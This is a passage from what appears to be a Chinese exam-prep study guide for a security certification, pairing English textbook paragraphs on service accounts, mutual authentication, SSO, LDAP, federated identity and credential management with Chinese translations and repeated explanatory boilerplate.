它们 通常与网络访问控制(NAC)系统配合,检查设备的健康状况,并根据NAC系 统内配置的要求授予或限制访问权限。 802.1X 是另一种用于设备认证的方法。 它可用于某些路由器和交换机的基于 端口的认证。 此外,它常与无线系统结合使用,强制用户在获得网络访问权 限前登录账户。 许多 MDM 和 NAC 解决方案都实现了 802.1X 解决方案, 以控制来自移动设备的用户访问。 如果设备或用户无法通过 802.1X 系统进 行认证,则无法访问网络。 服务身份验证

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

身份:身份是主体在系统中的标识。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

身份管理题要区分识别、认证、授权、审计。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 29 / PDF P945

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

Many services also require authentication, and they typically use a username and password. A service account is simply a user account that an administrator created for a service or application instead of a person. As an example, it's common to create a service account for third-party tools monitoring email in Microsoft's Exchange Server. These third-party tools typically need permission to scan all mailboxes looking for spam, malware, potential data exfiltration attempts, and more. Administrators create a Microsoft domain account and give the account the necessary privileges to perform the tasks. Some applications have built-in service accounts.

For example, Microsoft's SQL Server has a built-in account known as the sa (short for system administrator) account. It is a member of the sysadmin fixed server role and has unlimited permissions on the SQL instance. It's only enabled if the instance is configured for SQL Server Authentication. In older versions, the default was a blank password, and attackers frequently check to see if the account is enabled and if it has a blank or weak password. It's common to set the properties of the account so that the password never expires. For a regular user, you'd set the maximum password age to something like 45 days.

When the password expires, the system informs the user to change the password, and the user does so. However, a service can't respond to such a message and instead is just locked out. Because a service account has a high level of privileges, administrators configure it with a strong, complex password that is changed more often than regular users. However, administrators need to change these passwords manually. The longer a password remains the same, the more likely it will be compromised. Account access reviews can detect security issues for service accounts.

Another option is to configure the account to be noninteractive, which prevents a user from logging onto the account using traditional logon methods. Services can be configured to use certificate-based authentication. Certificates are issued to the device running the service and presented by the service when accessing resources. Web-based services often use application programming interface (API) methods to exchange information between systems. These API methods are different depending on the web-based service. As an example, Google and Facebook provide web-based services that web developers use, but they use different implementations.

中文直译 / 整理

许多服务也需要认证,通常使用用户名和密码。 服务账户只是一个管理员为服 务或应用程序(而非个人)创建的用户账户。 例如,通常会为第三方工具创建一个服务账户,用于监控微软Exchange Server中的电子邮件。 这些第三方工具通常需要权限来扫描所有邮箱,以查 找垃圾邮件、恶意软件、潜在的数据外泄尝试等。 管理员会创建一个微软域 账户,并赋予该账户执行这些任务所需的权限。 某些应用程序内置了服务账户。 例如,微软的SQL Server有一个内置账户, 称为sa账户(system administrator的缩写)。 它是sysadmin固定服务器 角色的成员,对SQL实例拥有无限权限。 只有当实例配置为SQL Server身份 验证时,该账户才会启用。 在旧版本中,默认密码为空,攻击者经常检查该账 户是否已启用,以及是否使用空密码或弱密码。 通常会将账户的属性设置为密码永不过期。 对于普通用户,您会将最大密码 年龄设置为大约45天。 当密码过期时,系统会通知用户更改密码,用户随后 进行更改。 然而,服务无法响应此类消息,而是直接被锁定。

由于服务账户具有较高的权限,管理员会为其配置一个强而复杂的密码,并比 普通用户更频繁地更改该密码。 然而,管理员需要手动更改这些密码。 密码保 持不变的时间越长,被泄露的可能性就越大。 账户访问审查可以检测服务账户 的安全问题。 另一种选择是将账户配置为非交互式,以防止用户使用传统的登 录方式登录该账户。 服务可以配置为使用基于证书的认证。 证书颁发给运行服务的设备,并在访问 资源时由服务出示。 基于网络的服务通常使用应用程序编程接口(API)方法在 系统之间交换信息。 这些API方法因基于网络的服务而异。 例如,Google和 Facebook提供网络服务供网页开发者使用,但它们的实现方式不同。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

数字证书:数字证书把身份和公钥绑定起来,由可信 CA 签发。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

证书不是密钥本身,而是身份与公钥的可信绑定。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
数字证书 数字证书把身份和公钥绑定起来,由可信 CA 签发。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 30 / PDF P946

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

Mutual Authentication There are many occasions when mutual authentication is needed. As an example, when a client accesses a server, both the client and the server provide authentication. This prevents a client from revealing information to a rogue server. Mutual authentication methods commonly use digital certificates. For example, when employees are connecting to a company network while working from home, they typically connect to a virtual private network (VPN) server. Both the server and the client present digital certificates to the other endpoint, providing two-way authentication. If this mutual authentication fails, the two endpoints don't start a communication session.

If an attacker redirected the traffic to a rogue VPN server, the authentication would fail, and the employee would know not to enter credentials. Implementing Identity Management Identity management (IdM) implementation techniques generally fall into two categories: Centralized access control implies that a single entity within a system performs all authorization verification. Decentralized access control (also known as distributed access control) implies that various entities located throughout a system perform authorization verification. A small team or individual can manage centralized access control.

Administrative overhead is lower because all changes are made in a single location, and a single change affects the entire system. However, a vulnerability is that centralized access control potentially creates a single point of failure. Another benefit of centralized identity management solutions is that they can scale up to support more users. For example, a Microsoft Active Directory domain can start with just a single domain controller. As the company grows, administrators can add additional domain controllers to handle the additional traffic. Decentralized access control often requires several teams or multiple individuals. Administrative overhead is higher because changes must be

中文直译 / 整理

双向认证 在许多情况下需要双向认证。 例如,当客户端访问服务器时,客户端和服务器 都会提供认证。 这可以防止客户端向恶意服务器泄露信息。 双向认证方法通常 使用数字证书。 例如,当员工在家工作并连接到公司网络时,他们通常会连接到虚拟专用网络 (VPN)服务器。 服务器和客户端都会向对方端点出示数字证书,以实现双向 认证。 如果此双向认证失败,两个端点将不会建立通信会话。 如果攻击者将流 量重定向到一个恶意的VPN服务器,认证将失败,员工便会知道不应输入凭据。 实施身份管理 身份管理(IdM)实施技术通常分为两类: 集中式访问控制意味着系统中的单一实体执行所有授权验证。 分布式访问控制(也称为分散式访问控制)意味着系统中各个实体执行 授权验证。 一个小团队或个人可以管理集中式访问控制。 管理开销较低,因为所有更 改都在单个位置进行,且一次更改会影响整个系统。 然而,一个潜在的漏 洞是,集中式访问控制可能造成单点故障。 集中式身份管理解决方案的另一个优势是它们能够扩展以支持更多用户。 例如, 一个 Microsoft Active Directory 域可以从单个域控制器开始。

随着公司的发 展,管理员可以添加更多的域控制器来处理额外的流量。 去中心化的访问控制通常需要多个团队或多个个体。 由于更改必须在多个位 置实施,因此管理开销更高。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

NIST:NIST 提供美国常用安全标准、框架和指南。

数字证书:数字证书把身份和公钥绑定起来,由可信 CA 签发。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

证书不是密钥本身,而是身份与公钥的可信绑定。

远程访问、站点到站点、安全隧道常对应 VPN/IPSec。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
NIST NIST 提供美国常用安全标准、框架和指南。
数字证书 数字证书把身份和公钥绑定起来,由可信 CA 签发。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
身份 身份是主体在系统中的标识。
学习单元 31 / PDF P947

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

implemented across numerous locations. Maintaining consistency across a system becomes more difficult as the number of access control points increases. Changes made to any individual access control point need to be repeated at every access point. Single Sign-On Single sign-on (SSO) is a centralized access control technique that allows a subject to be authenticated once on a system and access multiple resources without authenticating again. SSO is convenient for users, and it also has security benefits. When users have to remember multiple usernames and passwords, they often resort to writing them down, ultimately weakening security. Users are less likely to write down a single password.

SSO also eases administration by reducing the number of accounts required for a subject. The primary disadvantage to SSO is that once an account is compromised, an attacker gains unrestricted access to all of the authorized resources. However, most SSO systems include methods to protect user credentials. The following sections discuss several common SSO mechanisms. LDAP and Centralized Access Control Within a single organization, a centralized access control system is often used for SSO. For example, a directory service is a centralized database that includes information about subjects and objects, including authentication data.

Many directory services are based on the Lightweight Directory Access Protocol (LDAP). For example, the Microsoft Active Directory Domain Services (AD DS) is an LDAP-based directory. You can think of an LDAP directory as a telephone directory for network services and assets. Users, clients, and processes can search the directory service to find where a desired system or resource resides. Subjects must authenticate to the directory service before performing queries and lookup activities. Even after authentication, the directory service will reveal only certain information to a subject, based on its assigned privileges. Multiple domains and trusts are commonly used in access control systems.

A security domain is a collection of subjects and objects that share a common security policy, and individual domains can operate separately from other domains. Trusts are established between the domains to create a security bridge and allow users from one domain to access another domain's resources. Trusts can be one-way only, or they can be two-way.

中文直译 / 整理

随着访问控制点数量的增加,维持系统的一致性变得更加困难。 对任何单个 访问控制点所做的更改都需要在每个访问点重复执行。 单点登录 单点登录(SSO)是一种集中式访问控制技术,允许用户在系统上进行一次身 份验证后,无需再次验证即可访问多个资源。 SSO对用户而言更加便捷,同时 也具有安全优势。 当用户需要记住多个用户名和密码时,他们常常会将它们写 下来,最终削弱了安全性。 而用户不太可能记下单一密码。 SSO还通过减少用 户所需账户的数量,简化了管理。 SSO的主要缺点是,一旦账户被攻破,攻击者即可无限制地访问所有授权资源。 然而,大多数SSO系统都包含保护用户凭证的方法。 以下部分将讨论几种常见 的SSO机制。 LDAP与集中式访问控制 在单个组织内部,通常使用集中式访问控制系统实现SSO。 例如,目录服务是 一个集中式数据库,包含有关主体和对象的信息,包括身份验证数据。 许多目 录服务基于轻量级目录访问协议(LDAP)。 例如,Microsoft Active Directory Domain Services(AD DS)就是一种基于LDAP的目录。 您可以将 LDAP 目录视为网络服务和资产的电话簿。

用户、客户端和进程可 以搜索目录服务,以查找所需系统或资源的位置。 主体在执行查询和查找操 作前必须向目录服务进行身份验证。 即使通过身份验证后,目录服务也会根 据主体的分配权限,仅向其显示特定信息。 在访问控制系统中,通常使用多个域和信任关系。 安全域是一组共享相同安全 策略的主体和对象,各个域可以独立于其他域运行。 信任关系在域之间建立, 以创建安全桥梁,使一个域的用户能够访问另一个域的资源。 信任关系可以是 单向的,也可以是双向的。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
身份 身份是主体在系统中的标识。
学习单元 32 / PDF P948

第三方治理:外包不外包责任

供应商也要被合同、审计、评估和持续监控管理起来。

教材原文段落

LDAP and PKIs A public key infrastructure (PKI) uses LDAP when integrating digital certificates into transmissions. Chapter 7 covers the topic in more depth, but in short, a PKI is a group of technologies used to manage digital certificates during the certificate life cycle. There are many times when clients need to query a certificate authority (CA) for information on a certificate, and LDAP is one of the protocols used. LDAP and centralized access control systems can be used to support SSO capabilities. SSO and Federated Identities SSO is common on internal networks, and it is also used on the Internet with third-party services.

Many cloud-based applications use SSO solutions, making it easier for users to access resources over the Internet. Cloud-based applications use federated identity management (FIM) systems, which are a form of SSO. Identity management is the management of user identities and their credentials. A FIM system links a user's identity in one system with multiple identity management systems. FIM extends beyond a single organization. Multiple organizations can join a federation or group, where they agree to share identity information. Users in each organization can log on once in their own organization, and their credentials are matched with a federated identity.

They can then use this federated identity to access resources in any other organization within the federation. A federation can be composed of multiple networks within a single university campus, numerous college and university campuses, multiple organizations sharing resources, or any other group that can agree on a common federated identity management system. Members of the federation match user identities within an organization to federated identities. It's important to realize that membership in a federation doesn't automatically grant everyone access to all resources owned by other members of the federation. Instead, each organization decides what resources to share.

Administrators manage these details behind the scenes, and the process is usually transparent to users. The important point is that users don't need to enter their credentials again. LDAP

中文直译 / 整理

和 PKI 公钥基础设施(PKI)在将数字证书集成到传输中时使用LDAP。 第7章更深入 地探讨了该主题,但简而言之,PKI是一组用于在证书生命周期内管理数字证 书的技术。 客户端经常需要向证书颁发机构(CA)查询有关证书的信息,而 LDAP就是其中一种使用的协议。 LDAP和集中式访问控制系统可用于支持单点 登录(SSO)功能。 单点登录和联合身份 单点登录在内部网络中很常见,也用于互联网与第三方服务。 许多基于云的应 用程序使用单点登录解决方案,使用户更轻松地访问互联网资源。 基于云的应 用程序使用 联合身份管理(FIM) 系统,这是一种单点登录形式。 身份管理是管理用户身份及其 凭证。 FIM 系统将一个系统中的用户身份与多个身份管理系统关联起来。 FIM 超越了单一组织的范围。 多个组织可以加入一个联合体或群组,共同同 意共享身份信息。 每个组织中的用户只需在本组织内登录一次,其凭证就会与 联合身份匹配,然后他们可以使用该联合身份访问联合体内任何其他组织的资 源。 一个联邦可以由单个大学校园内的多个网络、多个学院和大学校园、共享资源 的多个组织,或任何其他能够就共同的联邦身份管理系统达成一致的群体组成。

联邦的成员将组织内的用户身份与联邦身份进行匹配。 重要的是要认识到,加入一个联合体并不会自动赋予每个人访问联合体内其他 成员所有资源的权限。 相反,每个组织自行决定共享哪些资源。 管理员在后台 管理这些细节,而这一过程对用户通常是透明的。 关键在于,用户无需再次输 入其凭据。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:供应商也要被合同、审计、评估和持续监控管理起来。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

公钥基础设施 PKI:PKI 用证书、CA、注册、吊销等机制管理公钥信任。

数字证书:数字证书把身份和公钥绑定起来,由可信 CA 签发。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第三方治理:外包不外包责任”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

CA、RA、证书、CRL、OCSP、信任链都是 PKI 高频点。

证书不是密钥本身,而是身份与公钥的可信绑定。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
公钥基础设施 PKI PKI 用证书、CA、注册、吊销等机制管理公钥信任。
数字证书 数字证书把身份和公钥绑定起来,由可信 CA 签发。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 33 / PDF P949

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

A challenge with multiple companies communicating in a federation is finding a common language. They often have different operating systems, but they still need to share a common language. Chapter 14 discusses the methods used to implement federated identity management systems. These include Security Assertion Markup Language (SAML), OAuth, and OpenID Connect (OIDC). Cloud-Based Federation A cloud-based federation typically uses a third-party service to share federated identities. As an example, many corporate online training websites use federated SSO systems.

When the organization coordinates with the online training company for employee access, they also coordinate the federated access details. A common method is to match the user's internal login ID with a federated identity. Users log on within the organization using their normal login ID. When the user accesses the training website with a web browser, the federated identity management system uses their login ID to retrieve the matching federated identity. If it finds a match, it authorizes the user access to the web pages granted to the federated identity.

On-Premises Federation Federated identity management systems can be hosted on-premises, in the cloud, or in a combination of the two as a hybrid system. As an example of an on-premises federated identity management system, imagine that Acme merges with Emca. Both companies have their own networks and SSO systems. However, management wants employees to be able to access resources in both networks without logging on twice. By creating an on-premises federated identity management system, both companies can share authentication data. This system allows users to continue to log on normally, and they will also have access to the other company's network resources.

An on-premises solution provides the organization with the most control. Hybrid Federation A hybrid federation is a combination of a cloud-based solution and an onpremises solution. Imagine Acme has a cloud-based federation providing

中文直译 / 整理

多个公司在联合体中通信的一个挑战是找到一种共同语言。 它们通常使用不同 的操作系统,但仍需共享一种共同语言。 第14章讨论了用于实现联合身份管理 系统的方法,包括安全断言标记语言(SAML)、OAuth 和 OpenID Connect(OIDC)。 基于云的联合 一个基于云的联合通常使用第三方服务来共享联合身份。 例如,许多企业在线 培训网站使用联合单点登录系统。 当组织与在线培训公司协调员工访问权限时, 也会协调联合访问的详细信息。 一种常见方法是将用户的内部登录ID与联合身份进行匹配。 用户在组织内部 使用其常规登录ID进行登录。 当用户通过网页浏览器访问培训网站时,联合 身份管理系统会使用其登录ID检索匹配的联合身份。 如果找到匹配项,系统 将授权用户访问该联合身份所对应的网页。 本地联合 联合身份管理系统可以托管在本地、云端,或两者结合的混合系统中。 作为本地联合身份管理系统的一个示例,假设Acme公司与Emca公司合并。 两家公司各自拥有自己的网络和单点登录系统。 然而,管理层希望员工无需 重复登录即可访问两个网络中的资源。 通过创建一个本地联合身份管理系统, 两家公司可以共享认证数据。

该系统允许用户继续正常登录,同时也能访问 另一家公司的网络资源。 本地解决方案为组织提供了最大程度的控制。 混合联邦 一个 混合联邦 是云解决方案和本地解决方案的结合。 假设 Acme 公司采用云联 邦为员工提供在线培训。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

身份:身份是主体在系统中的标识。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

身份管理题要区分识别、认证、授权、审计。

日志要保护完整性、时间同步和访问控制。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 34 / PDF P950

第三方治理:外包不外包责任

供应商也要被合同、审计、评估和持续监控管理起来。

教材原文段落

employees with online training. After the merger with Emca, they implement an on-premises solution to share identities with the two companies. This approach doesn't automatically give employees from Emca access to the training sites. However, it is possible to integrate the existing on-premises solution with the training sites' cloud-based solution. This creates a hybrid solution for Emca employees and, as with other federated solutions, provides SSO for Emca employees. Just-In-Time Some federated identity solutions support Just-in-Time (JIT) provisioning. These solutions automatically create the relationship between two entities so that new users can access resources.

A JIT solution creates the connection without any administrator intervention. For example, imagine Acme contracted with a third party to provide cafeteriastyle benefit plans for employees. The third-party site offers benefit choices such as healthcare plans, life insurance choices, and 401K contribution amounts. Employees access the third-party site and choose the benefits they want. One way to provide employees access to the third-party site is to create separate accounts for every employee, but that can be a huge administrative burden, especially as Acme hires new employees. With JIT provisioning, employees log on normally to their employer's network.

The first time the employee accesses the benefits site, the JIT system exchanges data with the employer's network and creates the employee's account. JIT systems commonly use SAML to exchange the required data. SAML provides entities with a lot of flexibility to exchange a wide assortment of data. The process starts with the third party verifying the user is logged onto a trusted organization's network. The employer's network then sends data on the employee, such as the username, first and last name, email address, and any other information needed by the third party. Credential Management Systems Credential management systems provide storage space for usernames and passwords.

As an example, many web browsers can remember usernames and passwords for any site that a user has visited.

中文直译 / 整理

在与 Emca 公司合并后,他们实施了一种本地解决方案,以在两家公司之间共享身 份。 这种方法不会自动为Emca的员工提供对培训网站的访问权限。 但是,可以将 现有的本地解决方案与培训网站的云解决方案集成。 这为Emca员工创建了一 种混合解决方案,并且与其他联合解决方案一样,为Emca员工提供了单点登 录功能。 按需供应 一些联合身份解决方案支持按需供应(JIT)。 这些解决方案会自动在两个实体 之间建立关系,以便新用户可以访问资源。 JIT解决方案在无需管理员干预的情 况下创建连接。 例如,假设Acme与第三方签订合同,为员工提供自助式福利计划。 第三方网 站提供多种福利选择,如医疗计划、人寿保险选项和401K缴款金额。 员工访问 第三方网站并选择所需的福利。 一种让员工访问第三方网站的方法是为每位员 工创建独立账户,但这可能带来巨大的管理负担,尤其是在Acme招聘新员工 时。 通过即时(JIT)供应,员工正常登录到其雇主的网络。 当员工首次访问 福利网站时,JIT系统会与雇主的网络交换数据并创建员工账户。 JIT系统通常使用SAML来交换所需数据。 SAML为实体提供了极大的灵活性, 以交换各种类型的数据。

该过程从第三方验证用户已登录到受信任组织的网络 开始。 随后,雇主的网络会发送有关员工的数据,例如用户名、姓氏、名字、 电子邮件地址以及第三方所需的任何其他信息。 凭据管理系统 凭据管理系统为用户名和密码提供存储空间。 例如,许多网页浏览器可以记住 用户访问过的任何网站的用户名和密码。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:供应商也要被合同、审计、评估和持续监控管理起来。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

身份:身份是主体在系统中的标识。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第三方治理:外包不外包责任”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

身份管理题要区分识别、认证、授权、审计。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 35 / PDF P951

第三方治理:外包不外包责任

供应商也要被合同、审计、评估和持续监控管理起来。

教材原文段落

The World Wide Web Consortium (W3C) published the Credential Management Level 1 API in January 2019. Many web browsers have adopted the API for credential management. The API provides several benefits that developers can implement programmatically: Offering to store the user's credentials after logging on Showing a credential chooser, allowing the user to skip sign-in forms Automatically logging the user on in subsequent visits, unless the user signed out Some federated identity management solutions use the Credential Management API. This allows different web applications to implement SSO solutions using a federated identity provider.

As an example, if you have a Google or Facebook account, you can use one of them to sign in to Zoom. Identity as a service (IDaaS) is a third-party service that provides identity and access management (IAM). IDaaS effectively provides SSO for the cloud and is especially useful when internal clients access cloud-based software-as-aservice (SaaS) applications. Google implements this with its motto of “One Google Account for everything Google.” Users log into their Google account once, and it provides them with access to multiple Google cloud-based applications without requiring users to log in again.

As another example, Microsoft 365 provides Office applications as a combination of installed applications and SaaS applications. Users have full Office desktop applications installed on their user systems, which can also connect to cloud storage using OneDrive. This allows users to edit and share files from multiple devices. When people use Microsoft 365 at home, Microsoft provides IDaaS, allowing users to authenticate via the cloud to access their data on OneDrive. When employees use Microsoft 365 from within an enterprise, administrators can integrate the network with a third-party service. For example, Delinea provides third-party services that integrate with Microsoft Active Directory.

Once configured, users log onto the domain and access Microsoft 365 cloud resources without logging on again. Credential Manager Apps Windows includes the Credential Manager applet in Control Panel. When a user enters credentials in a browser or a Windows application, Credential

中文直译 / 整理

